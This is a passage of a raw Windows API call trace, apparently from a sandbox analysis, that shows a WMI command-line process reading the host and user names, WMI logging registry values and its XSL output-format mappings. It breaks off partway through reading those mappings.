GetComputerNameW (in: lpBuffer=0x3202788, nSize=0x9cf9e0 | out: lpBuffer="NQDPDE", nSize=0x9cf9e0) returned 1 [0280.107] lstrlenW (lpString="NQDPDE") returned 6 [0280.107] malloc (_Size=0xe) returned 0x3201208 [0280.107] lstrlenW (lpString="NQDPDE") returned 6 [0280.107] ResolveDelayLoadedAPI () returned 0x7444db00 [0280.107] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x9cf9f4 | out: lpNameBuffer=0x0, nSize=0x9cf9f4) returned 0x2ccd000 [0280.109] GetLastError () returned 0xea [0280.109] malloc (_Size=0x1e) returned 0x32027b0 [0280.109] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x32027b0, nSize=0x9cf9f4 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x9cf9f4) returned 0x1 [0280.110] lstrlenW (lpString="") returned 0 [0280.110] lstrlenW (lpString="NQDPDE") returned 6 [0280.110] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0280.111] lstrlenW (lpString=".") returned 1 [0280.111] lstrlenW (lpString="NQDPDE") returned 6 [0280.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0280.111] lstrlenW (lpString="LOCALHOST") returned 9 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0280.112] free (_Block=0x3201208) [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] malloc (_Size=0xe) returned 0x3201208 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] malloc (_Size=0xe) returned 0x32027d8 [0280.112] lstrlenW (lpString="NQDPDE") returned 6 [0280.112] malloc (_Size=0x4) returned 0x32027f0 [0280.112] malloc (_Size=0xc) returned 0x3202800 [0280.112] ResolveDelayLoadedAPI () returned 0x7745b870 [0280.123] malloc (_Size=0x18) returned 0x3202818 [0280.123] malloc (_Size=0xc) returned 0x3202838 [0280.123] SysStringLen (param_1="IDENTIFY") returned 0x8 [0280.123] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0280.123] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0280.123] SysStringLen (param_1="IDENTIFY") returned 0x8 [0280.123] malloc (_Size=0x18) returned 0x3202850 [0280.123] malloc (_Size=0xc) returned 0x3202870 [0280.123] SysStringLen (param_1="IMPERSONATE") returned 0xb [0280.123] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0280.123] SysStringLen (param_1="IMPERSONATE") returned 0xb [0280.123] SysStringLen (param_1="IDENTIFY") returned 0x8 [0280.123] SysStringLen (param_1="IDENTIFY") returned 0x8 [0280.123] SysStringLen (param_1="IMPERSONATE") returned 0xb [0280.123] malloc (_Size=0x18) returned 0x3202888 [0280.123] malloc (_Size=0xc) returned 0x32028a8 [0280.123] SysStringLen (param_1="DELEGATE") returned 0x8 [0280.123] SysStringLen (param_1="IDENTIFY") returned 0x8 [0280.123] SysStringLen (param_1="DELEGATE") returned 0x8 [0280.124] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0280.124] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0280.124] SysStringLen (param_1="DELEGATE") returned 0x8 [0280.124] malloc (_Size=0x18) returned 0x32028c0 [0280.124] malloc (_Size=0xc) returned 0x32028e0 [0280.124] malloc (_Size=0x18) returned 0x32028f8 [0280.124] malloc (_Size=0xc) returned 0x3202918 [0280.124] SysStringLen (param_1="NONE") returned 0x4 [0280.124] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.124] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.124] SysStringLen (param_1="NONE") returned 0x4 [0280.124] malloc (_Size=0x18) returned 0x3202930 [0280.124] malloc (_Size=0xc) returned 0x3202950 [0280.124] SysStringLen (param_1="CONNECT") returned 0x7 [0280.124] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.124] malloc (_Size=0x18) returned 0x3202968 [0280.124] malloc (_Size=0xc) returned 0x3202988 [0280.124] SysStringLen (param_1="CALL") returned 0x4 [0280.124] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.124] SysStringLen (param_1="CALL") returned 0x4 [0280.124] SysStringLen (param_1="CONNECT") returned 0x7 [0280.124] malloc (_Size=0x18) returned 0x32029a0 [0280.124] malloc (_Size=0xc) returned 0x32004a0 [0280.125] SysStringLen (param_1="PKT") returned 0x3 [0280.125] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.125] SysStringLen (param_1="PKT") returned 0x3 [0280.125] SysStringLen (param_1="NONE") returned 0x4 [0280.125] SysStringLen (param_1="NONE") returned 0x4 [0280.125] SysStringLen (param_1="PKT") returned 0x3 [0280.125] malloc (_Size=0x18) returned 0x32004b8 [0280.125] malloc (_Size=0xc) returned 0x32004d8 [0280.125] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.126] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] SysStringLen (param_1="NONE") returned 0x4 [0280.126] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] SysStringLen (param_1="PKT") returned 0x3 [0280.126] SysStringLen (param_1="PKT") returned 0x3 [0280.126] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] malloc (_Size=0x18) returned 0x3202ca8 [0280.126] malloc (_Size=0xc) returned 0x32004f0 [0280.126] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0280.126] SysStringLen (param_1="DEFAULT") returned 0x7 [0280.126] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0280.126] SysStringLen (param_1="PKT") returned 0x3 [0280.126] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0280.126] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0280.126] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0280.126] malloc (_Size=0x18) returned 0x3202d48 [0280.126] malloc (_Size=0x40) returned 0x3200508 [0280.126] malloc (_Size=0x20a) returned 0x32097c8 [0280.126] GetSystemDirectoryW (in: lpBuffer=0x32097c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0280.126] free (_Block=0x32097c8) [0280.126] malloc (_Size=0xc) returned 0x3200550 [0280.126] malloc (_Size=0xc) returned 0x3200568 [0280.127] malloc (_Size=0xc) returned 0x32098e0 [0280.127] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0280.127] SysStringLen (param_1="\\wbem\\") returned 0x6 [0280.127] free (_Block=0x3200550) [0280.127] free (_Block=0x3200568) [0280.127] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0280.127] free (_Block=0x32098e0) [0280.127] malloc (_Size=0xc) returned 0x3209988 [0280.127] malloc (_Size=0xc) returned 0x32098f8 [0280.127] malloc (_Size=0xc) returned 0x3209838 [0280.127] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0280.127] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0280.127] free (_Block=0x3209988) [0280.127] free (_Block=0x32098f8) [0280.128] GetCurrentThreadId () returned 0x1114 [0280.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x9cf504 | out: phkResult=0x9cf504*=0x1a0) returned 0x0 [0280.128] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x9cf510, lpcbData=0x9cf50c*=0x400 | out: lpType=0x0, lpData=0x9cf510*=0x30, lpcbData=0x9cf50c*=0x4) returned 0x0 [0280.128] _wcsicmp (_String1="0", _String2="1") returned -1 [0280.128] _wcsicmp (_String1="0", _String2="2") returned -2 [0280.128] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x9cf50c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x9cf50c*=0x42) returned 0x0 [0280.128] malloc (_Size=0x86) returned 0x3202dc8 [0280.128] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3202dc8, lpcbData=0x9cf50c*=0x42 | out: lpType=0x0, lpData=0x3202dc8*=0x25, lpcbData=0x9cf50c*=0x42) returned 0x0 [0280.128] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0280.128] malloc (_Size=0x42) returned 0x3200550 [0280.128] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0280.128] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x9cf510, lpcbData=0x9cf50c*=0x400 | out: lpType=0x0, lpData=0x9cf510*=0x36, lpcbData=0x9cf50c*=0xc) returned 0x0 [0280.128] _wtol (_String="65536") returned 65536 [0280.128] free (_Block=0x3202dc8) [0280.128] RegCloseKey (hKey=0x0) returned 0x6 [0280.128] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x9cf9a0 | out: ppv=0x9cf9a0*=0x37445a8) returned 0x0 [0280.151] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x37445a8, xmlSource=0x9cf924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x9cf98c | out: isSuccessful=0x9cf98c*=0xffff) returned 0x0 [0280.296] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x37445a8, DOMElement=0x9cf99c | out: DOMElement=0x9cf99c*=0x3746b48) returned 0x0 [0280.297] malloc (_Size=0xc) returned 0x3209958 [0280.297] IXMLDOMElement:getElementsByTagName (in: This=0x3746b48, tagName="XSLFORMAT", resultList=0x9cf998 | out: resultList=0x9cf998*=0x3749ca0) returned 0x0 [0280.298] free (_Block=0x3209958) [0280.299] IXMLDOMNodeList:get_length (in: This=0x3749ca0, listLength=0x9cf994 | out: listLength=0x9cf994*=21) returned 0x0 [0280.299] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=0, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.300] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.300] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.300] malloc (_Size=0xc) returned 0x3209988 [0280.300] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.300] free (_Block=0x3209988) [0280.301] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0280.301] malloc (_Size=0xc) returned 0x3209808 [0280.301] malloc (_Size=0xc) returned 0x3209820 [0280.301] malloc (_Size=0x18) returned 0x3202cc8 [0280.301] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.301] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.301] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.301] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=1, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.301] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="textvaluelist.xsl") returned 0x0 [0280.301] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.302] malloc (_Size=0xc) returned 0x3209850 [0280.302] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.302] free (_Block=0x3209850) [0280.302] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0280.302] malloc (_Size=0xc) returned 0x3209958 [0280.302] malloc (_Size=0xc) returned 0x32098b0 [0280.302] SysStringLen (param_1="VALUE") returned 0x5 [0280.302] SysStringLen (param_1="TABLE") returned 0x5 [0280.302] SysStringLen (param_1="TABLE") returned 0x5 [0280.303] SysStringLen (param_1="VALUE") returned 0x5 [0280.303] malloc (_Size=0x18) returned 0x3202da8 [0280.303] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.303] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.303] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.303] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=2, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.303] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="textvaluelist.xsl") returned 0x0 [0280.303] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.303] malloc (_Size=0xc) returned 0x32098c8 [0280.303] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.304] free (_Block=0x32098c8) [0280.304] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0280.304] malloc (_Size=0xc) returned 0x3209928 [0280.304] malloc (_Size=0xc) returned 0x3209850 [0280.304] SysStringLen (param_1="LIST") returned 0x4 [0280.304] SysStringLen (param_1="TABLE") returned 0x5 [0280.304] malloc (_Size=0x18) returned 0x3202b48 [0280.304] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.304] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.304] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.304] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=3, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.304] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="rawxml.xsl") returned 0x0 [0280.304] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.305] malloc (_Size=0xc) returned 0x3209868 [0280.305] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.305] free (_Block=0x3209868) [0280.305] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0280.305] malloc (_Size=0xc) returned 0x32099a0 [0280.305] malloc (_Size=0xc) returned 0x3209970 [0280.305] SysStringLen (param_1="RAWXML") returned 0x6 [0280.305] SysStringLen (param_1="TABLE") returned 0x5 [0280.305] SysStringLen (param_1="RAWXML") returned 0x6 [0280.305] SysStringLen (param_1="LIST") returned 0x4 [0280.305] SysStringLen (param_1="LIST") returned 0x4 [0280.305] SysStringLen (param_1="RAWXML") returned 0x6 [0280.305] malloc (_Size=0x18) returned 0x32029e8 [0280.305] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.306] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.306] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.306] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=4, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.306] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="htable.xsl") returned 0x0 [0280.306] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.306] malloc (_Size=0xc) returned 0x3209988 [0280.306] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.306] free (_Block=0x3209988) [0280.306] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0280.306] malloc (_Size=0xc) returned 0x3209898 [0280.306] malloc (_Size=0xc) returned 0x3209940 [0280.307] SysStringLen (param_1="HTABLE") returned 0x6 [0280.307] SysStringLen (param_1="TABLE") returned 0x5 [0280.307] SysStringLen (param_1="HTABLE") returned 0x6 [0280.307] SysStringLen (param_1="LIST") returned 0x4 [0280.307] malloc (_Size=0x18) returned 0x3202d68 [0280.307] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.307] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.307] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.307] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=5, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.307] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="hform.xsl") returned 0x0 [0280.307] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.307] malloc (_Size=0xc) returned 0x3209910 [0280.307] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.308] free (_Block=0x3209910) [0280.308] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0280.308] malloc (_Size=0xc) returned 0x32098c8 [0280.308] malloc (_Size=0xc) returned 0x32097f0 [0280.308] SysStringLen (param_1="HFORM") returned 0x5 [0280.308] SysStringLen (param_1="TABLE") returned 0x5 [0280.308] SysStringLen (param_1="HFORM") returned 0x5 [0280.308] SysStringLen (param_1="LIST") returned 0x4 [0280.308] SysStringLen (param_1="HFORM") returned 0x5 [0280.308] SysStringLen (param_1="HTABLE") returned 0x6 [0280.308] malloc (_Size=0x18) returned 0x3202a08 [0280.308] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.308] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.308] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.308] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=6, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.308] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="xml.xsl") returned 0x0 [0280.309] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.309] malloc (_Size=0xc) returned 0x3209988 [0280.309] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.309] free (_Block=0x3209988) [0280.309] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0280.309] malloc (_Size=0xc) returned 0x3209988 [0280.309] malloc (_Size=0xc) returned 0x32098e0 [0280.309] SysStringLen (param_1="XML") returned 0x3 [0280.309] SysStringLen (param_1="TABLE") returned 0x5 [0280.309] SysStringLen (param_1="XML") returned 0x3 [0280.309] SysStringLen (param_1="VALUE") returned 0x5 [0280.309] SysStringLen (param_1="VALUE") returned 0x5 [0280.309] SysStringLen (param_1="XML") returned 0x3 [0280.309] malloc (_Size=0x18) returned 0x3202d28 [0280.310] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.310] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.310] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.310] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=7, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.310] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="mof.xsl") returned 0x0 [0280.310] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.310] malloc (_Size=0xc) returned 0x3209868 [0280.310] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.310] free (_Block=0x3209868) [0280.310] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0280.311] malloc (_Size=0xc) returned 0x32099b8 [0280.311] malloc (_Size=0xc) returned 0x32098f8 [0280.311] SysStringLen (param_1="MOF") returned 0x3 [0280.311] SysStringLen (param_1="TABLE") returned 0x5 [0280.311] SysStringLen (param_1="MOF") returned 0x3 [0280.311] SysStringLen (param_1="LIST") returned 0x4 [0280.311] SysStringLen (param_1="MOF") returned 0x3 [0280.311] SysStringLen (param_1="RAWXML") returned 0x6 [0280.311] SysStringLen (param_1="LIST") returned 0x4 [0280.311] SysStringLen (param_1="MOF") returned 0x3 [0280.311] malloc (_Size=0x18) returned 0x3202b68 [0280.311] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.311] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.311] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.312] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=8, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.312] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="csv.xsl") returned 0x0 [0280.312] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.312] malloc (_Size=0xc) returned 0x3209910 [0280.312] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.312] free (_Block=0x3209910) [0280.312] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0280.312] malloc (_Size=0xc) returned 0x3209880 [0280.313] malloc (_Size=0xc) returned 0x3209910 [0280.313] SysStringLen (param_1="CSV") returned 0x3 [0280.313] SysStringLen (param_1="TABLE") returned 0x5 [0280.313] SysStringLen (param_1="CSV") returned 0x3 [0280.313] SysStringLen (param_1="LIST") returned 0x4 [0280.313] SysStringLen (param_1="CSV") returned 0x3 [0280.313] SysStringLen (param_1="HTABLE") returned 0x6 [0280.313] SysStringLen (param_1="CSV") returned 0x3 [0280.313] SysStringLen (param_1="HFORM") returned 0x5 [0280.313] malloc (_Size=0x18) returned 0x3202a28 [0280.313] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.313] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.313] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.313] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=9, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.313] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.313] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.314] malloc (_Size=0xc) returned 0x3209868 [0280.314] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.314] free (_Block=0x3209868) [0280.314] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0280.314] malloc (_Size=0xc) returned 0x3209868 [0280.314] malloc (_Size=0xc) returned 0x320ac18 [0280.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.314] SysStringLen (param_1="TABLE") returned 0x5 [0280.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.314] SysStringLen (param_1="VALUE") returned 0x5 [0280.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.314] SysStringLen (param_1="XML") returned 0x3 [0280.314] SysStringLen (param_1="XML") returned 0x3 [0280.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.314] malloc (_Size=0x18) returned 0x3202b28 [0280.314] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.315] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.315] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.315] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=10, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.315] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.315] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.315] malloc (_Size=0xc) returned 0x320ac48 [0280.315] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.315] free (_Block=0x320ac48) [0280.315] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0280.315] malloc (_Size=0xc) returned 0x320ac78 [0280.315] malloc (_Size=0xc) returned 0x320aca8 [0280.315] SysStringLen (param_1="texttablewsys") returned 0xd [0280.315] SysStringLen (param_1="TABLE") returned 0x5 [0280.315] SysStringLen (param_1="texttablewsys") returned 0xd [0280.315] SysStringLen (param_1="XML") returned 0x3 [0280.316] SysStringLen (param_1="texttablewsys") returned 0xd [0280.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.316] SysStringLen (param_1="XML") returned 0x3 [0280.316] SysStringLen (param_1="texttablewsys") returned 0xd [0280.316] malloc (_Size=0x18) returned 0x3202a48 [0280.316] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.316] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.316] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.316] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=11, listItem=0x9cf9b4 | out: 